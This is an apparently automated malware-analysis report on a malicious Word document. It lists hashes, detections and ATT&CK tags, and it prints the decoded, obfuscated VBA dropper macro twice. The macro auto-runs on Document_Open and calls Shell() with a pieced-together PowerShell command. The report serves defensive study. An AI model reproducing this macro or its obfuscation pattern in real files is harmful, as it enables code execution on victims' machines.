Office (OLE) malware analysis — malicious · edc2ac668d69a215

MALICIOUS

Office (OLE)

124.2 KB Created: 2018-06-17 21:19:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 39a0b36ffd51fac29e8e05689ff59ac8 SHA-1: 78e76418458d2ca67d6e448d478c98b292fcffbb SHA-256: edc2ac668d69a2158f2f1015d10b7b03fbf00dbc1c7eae3342cdec295709dd7b

222 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The file is a malicious Office document containing VBA macros. The 'Document_Open' macro is present and utilizes a 'Shell()' call, indicating an attempt to execute arbitrary code. The script attempts to construct and execute a PowerShell command, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6591643-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6591643-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17635 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17635 bytes
SHA-256: `b08cc975c55c985bb63d3fe57e6b7e8d8b868597362aec38aaa8eb5659b19c6a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "JCWBzrKv" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function NGIkV() On Error Resume Next jHipt = Atn(GSWEE + Sin(HiPbn) - 29213 / 22801) nputI = 82707 + 45191 ijvjdr = 58449 / 49206 oviJG = zojEjH * CSng(84700 * Fix(15192)) * qYGjW + CSng(YHrwT + CLng(UTwpWN)) / (zUiuQp * CSng(17066) - (89962 + Fix(lmuRj) - (73886 + CLng(VBHBS - Log(nnLmw) - 58616 + Int(kPNtt))))) WZAYX = wqMNn CmSmi = Atn(obqTri + Sin(IaktRj) - 79366 / 88769) wQiGl = 82788 + 92566 HSHNld = 59854 / 18671 IbziN = CLuMCi * CSng(64062 * Fix(92918)) * iEdjf + CSng(kbBYV + CLng(PMcsAi)) / (NubSK * CSng(94966) - (650 + Fix(wzLEdC) - (31167 + CLng(CHHQn - Log(AwKsp) - 74731 + Int(SUBANj))))) QSKBQ = UlFjYF YGiKSh = Atn(AprIcK + Sin(HRQcl) - 15938 / 61546) AHnqsj = 15968 + 67981 HLdGz = 51204 / 88356 tLXizi = wKwjP * CSng(51573 * Fix(29397)) * HKvYfa + CSng(VZQRA + CLng(ulvBUj)) / (wdlpq * CSng(39401) - (17280 + Fix(bZbas) - (95666 + CLng(hnjDGn - Log(zNhirC) - 48686 + Int(furqq))))) iCGGJj = soGwz Izvltl = Atn(LFisi + Sin(YVcBOi) - 97690 / 88518) qWOrV = 87280 + 26372 BtIwz = 85398 / 64304 OEizAz = hLhTG * CSng(14121 * Fix(17590)) * VEuaQ + CSng(oiLiz + CLng(pOPdh)) / (ETzYIJ * CSng(64247) - (59254 + Fix(dYdqR) - (63686 + CLng(smbSz - Log(ZaWOA) - 66675 + Int(SvElaD))))) rQOrI = rqZMsO NGIkV = iOoSvjhbs + Chr$(dwOwEIALXGf + 80 + wXQPQTTJPu) + "OwerSH" + uOibLE + IzOzajUoCm + dEjCpVqQaro + IzbpPMBjS vtcwz = Atn(zhwUQ + Sin(ssvZja) - 73461 / 5507) oWSwJ = 94245 + 36690 hoPKb = 68611 / 47048 XrEvl = CcuoUi * CSng(72474 * Fix(83661)) * UrQalL + CSng(WFfDNX + CLng(zovORT)) / (JwWwp * CSng(26555) - (58633 + Fix(Yjiwv) - (95208 + CLng(sWhqh - Log(wPiji) - 73600 + Int(AYPTXC))))) TOYsmL = ultWYR rSjCz = Atn(KUfKXS + Sin(ouNLf) - 94634 / 19381) NSCtB = 9043 + 99331 WizOS = 37774 / 67266 tlAzOF = mWbZh * CSng(54372 * Fix(11306)) * jGhwiv + CSng(PiuOaz + CLng(ihTAk)) / (nsnzt * CSng(65212) - (97658 + Fix(vzjqH) - (51049 + CLng(nUIUn - Log(VVEzi) - 28819 + Int(otFhrk))))) tCzXW = UkFXqA End Function Function MlPQSMiH(mpWzEO) On Error Resume Next zQGpi = Atn(OtjjbC + Sin(liwWR) - 23743 / 12476) qucMs = 82799 + 86873 jNQoh = 61548 / 81391 tBuamV = moidbS * CSng(72062 * Fix(16260)) * vAMac + CSng(HGJPj + CLng(UCacpV)) / (AEzkF * CSng(69969) - (97072 + Fix(tNZjE) - (72411 + CLng(RriSD - Log(unRWov) - 33522 + Int(DAlwlH))))) nmTdm = bXcZz OwtQit = Atn(PWSIO + Sin(wbHwJi) - 7096 / 41335) uhqNtB = 99423 + 39170 BFjtvV = 21359 / 27024 OiZBB = CpBzI * CSng(45664 * Fix(62648)) * tIZdSH + CSng(usNaWz + CLng(DvfjV)) / (YIuck * CSng(3485) - (47371 + Fix(bcqINk) - (93649 + CLng(UXhMb - Log(mLaiS) - 60165 + Int(FRcBWX))))) rMLqX = QdhCXo rQQCf = OIijiVC + Shell(prhwow + mpWzEO + EIBQLCT, 2194 - 2194) wcnwq = Atn(vfNvi + Sin(zcSVpA) - 34842 / 48392) WDEni = 18753 + 56508 ZZlint = 2755 / 29895 nUPfvn = pwwEIL * CSng(32926 * Fix(4013)) * IEdif + CSng(Bwtsj + CLng(oHrBkN)) / (svLcq * CSng(68637) - (77525 + Fix(GSjwEB) - (79072 + CLng(ZjvNmT - Log(lCEBA) - 80995 + Int(DYzMJ))))) zsrVi = twWVXl End Function Private Sub Document_open() On Error Resume Next iZjMKw = Atn(XhIXb + Sin(Mwbji) - 99923 / 45475) GaWAN = 74189 + 65444 oLCcCH = 98696 / 74323 zukpXC = QDXtQ * CSng(10426 * Fix(93529)) * mitUbs + CSng(wBsASL + CLng(mjOhZ)) / (zHfKv * CSng(84884) - (62598 + Fix(wiVTK) - (76789 + CLng(WTSGpT - Log(jwWjpE) - 32169 + Int(iifvof))))) PzEYks = dIzMZ ZimZO = Atn(ZtWVD + Sin(sssam) - 54876 / 2493) bRdAii = 14285 + 92679 XADtA = 89446 / 15309 oHPuO = kIrXku * CSng(87200 * Fix(46971)) * rcDEG + CSng(ALJwj + CLng(zBcRfq)) / (LwJpi * CSng(80314) - (86607 + Fix(Hoovi) - (86375 + CLng(ICiCp - Log(nwFwiv) - 71305 + Int(OGFDr))))) sijrrf = aPFncN Application.Run CRhLKt + "MlPQSMiH" + AQhStEDGodB, LNYzY + NGIkV + jmIPmTN XEWoBV = Atn(UkoUT + Sin(Cjibb) - 35144 / 24107) akscCs = 27387 + 76956 dIjdiq = 62875 / 61140 ... (truncated)

SHA-256: b08cc975c55c985bb63d3fe57e6b7e8d8b868597362aec38aaa8eb5659b19c6a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "JCWBzrKv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NGIkV()
On Error Resume Next
jHipt = Atn(GSWEE + Sin(HiPbn) - 29213 / 22801)
nputI = 82707 + 45191
ijvjdr = 58449 / 49206
oviJG = zojEjH * CSng(84700 * Fix(15192)) * qYGjW + CSng(YHrwT + CLng(UTwpWN)) / (zUiuQp * CSng(17066) - (89962 + Fix(lmuRj) - (73886 + CLng(VBHBS - Log(nnLmw) - 58616 + Int(kPNtt)))))
WZAYX = wqMNn
CmSmi = Atn(obqTri + Sin(IaktRj) - 79366 / 88769)
wQiGl = 82788 + 92566
HSHNld = 59854 / 18671
IbziN = CLuMCi * CSng(64062 * Fix(92918)) * iEdjf + CSng(kbBYV + CLng(PMcsAi)) / (NubSK * CSng(94966) - (650 + Fix(wzLEdC) - (31167 + CLng(CHHQn - Log(AwKsp) - 74731 + Int(SUBANj)))))
QSKBQ = UlFjYF
YGiKSh = Atn(AprIcK + Sin(HRQcl) - 15938 / 61546)
AHnqsj = 15968 + 67981
HLdGz = 51204 / 88356
tLXizi = wKwjP * CSng(51573 * Fix(29397)) * HKvYfa + CSng(VZQRA + CLng(ulvBUj)) / (wdlpq * CSng(39401) - (17280 + Fix(bZbas) - (95666 + CLng(hnjDGn - Log(zNhirC) - 48686 + Int(furqq)))))
iCGGJj = soGwz
Izvltl = Atn(LFisi + Sin(YVcBOi) - 97690 / 88518)
qWOrV = 87280 + 26372
BtIwz = 85398 / 64304
OEizAz = hLhTG * CSng(14121 * Fix(17590)) * VEuaQ + CSng(oiLiz + CLng(pOPdh)) / (ETzYIJ * CSng(64247) - (59254 + Fix(dYdqR) - (63686 + CLng(smbSz - Log(ZaWOA) - 66675 + Int(SvElaD)))))
rQOrI = rqZMsO
NGIkV = iOoSvjhbs + Chr$(dwOwEIALXGf + 80 + wXQPQTTJPu) + "OwerSH" + uOibLE + IzOzajUoCm + dEjCpVqQaro + IzbpPMBjS
vtcwz = Atn(zhwUQ + Sin(ssvZja) - 73461 / 5507)
oWSwJ = 94245 + 36690
hoPKb = 68611 / 47048
XrEvl = CcuoUi * CSng(72474 * Fix(83661)) * UrQalL + CSng(WFfDNX + CLng(zovORT)) / (JwWwp * CSng(26555) - (58633 + Fix(Yjiwv) - (95208 + CLng(sWhqh - Log(wPiji) - 73600 + Int(AYPTXC)))))
TOYsmL = ultWYR
rSjCz = Atn(KUfKXS + Sin(ouNLf) - 94634 / 19381)
NSCtB = 9043 + 99331
WizOS = 37774 / 67266
tlAzOF = mWbZh * CSng(54372 * Fix(11306)) * jGhwiv + CSng(PiuOaz + CLng(ihTAk)) / (nsnzt * CSng(65212) - (97658 + Fix(vzjqH) - (51049 + CLng(nUIUn - Log(VVEzi) - 28819 + Int(otFhrk)))))
tCzXW = UkFXqA
End Function
Function MlPQSMiH(mpWzEO)
On Error Resume Next
zQGpi = Atn(OtjjbC + Sin(liwWR) - 23743 / 12476)
qucMs = 82799 + 86873
jNQoh = 61548 / 81391
tBuamV = moidbS * CSng(72062 * Fix(16260)) * vAMac + CSng(HGJPj + CLng(UCacpV)) / (AEzkF * CSng(69969) - (97072 + Fix(tNZjE) - (72411 + CLng(RriSD - Log(unRWov) - 33522 + Int(DAlwlH)))))
nmTdm = bXcZz
OwtQit = Atn(PWSIO + Sin(wbHwJi) - 7096 / 41335)
uhqNtB = 99423 + 39170
BFjtvV = 21359 / 27024
OiZBB = CpBzI * CSng(45664 * Fix(62648)) * tIZdSH + CSng(usNaWz + CLng(DvfjV)) / (YIuck * CSng(3485) - (47371 + Fix(bcqINk) - (93649 + CLng(UXhMb - Log(mLaiS) - 60165 + Int(FRcBWX)))))
rMLqX = QdhCXo
rQQCf = OIijiVC + Shell(prhwow + mpWzEO + EIBQLCT, 2194 - 2194)
wcnwq = Atn(vfNvi + Sin(zcSVpA) - 34842 / 48392)
WDEni = 18753 + 56508
ZZlint = 2755 / 29895
nUPfvn = pwwEIL * CSng(32926 * Fix(4013)) * IEdif + CSng(Bwtsj + CLng(oHrBkN)) / (svLcq * CSng(68637) - (77525 + Fix(GSjwEB) - (79072 + CLng(ZjvNmT - Log(lCEBA) - 80995 + Int(DYzMJ)))))
zsrVi = twWVXl
End Function
Private Sub Document_open()
On Error Resume Next
iZjMKw = Atn(XhIXb + Sin(Mwbji) - 99923 / 45475)
GaWAN = 74189 + 65444
oLCcCH = 98696 / 74323
zukpXC = QDXtQ * CSng(10426 * Fix(93529)) * mitUbs + CSng(wBsASL + CLng(mjOhZ)) / (zHfKv * CSng(84884) - (62598 + Fix(wiVTK) - (76789 + CLng(WTSGpT - Log(jwWjpE) - 32169 + Int(iifvof)))))
PzEYks = dIzMZ
ZimZO = Atn(ZtWVD + Sin(sssam) - 54876 / 2493)
bRdAii = 14285 + 92679
XADtA = 89446 / 15309
oHPuO = kIrXku * CSng(87200 * Fix(46971)) * rcDEG + CSng(ALJwj + CLng(zBcRfq)) / (LwJpi * CSng(80314) - (86607 + Fix(Hoovi) - (86375 + CLng(ICiCp - Log(nwFwiv) - 71305 + Int(OGFDr)))))
sijrrf = aPFncN
Application.Run CRhLKt + "MlPQSMiH" + AQhStEDGodB, LNYzY + NGIkV + jmIPmTN
XEWoBV = Atn(UkoUT + Sin(Cjibb) - 35144 / 24107)
akscCs = 27387 + 76956
dIjdiq = 62875 / 61140
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.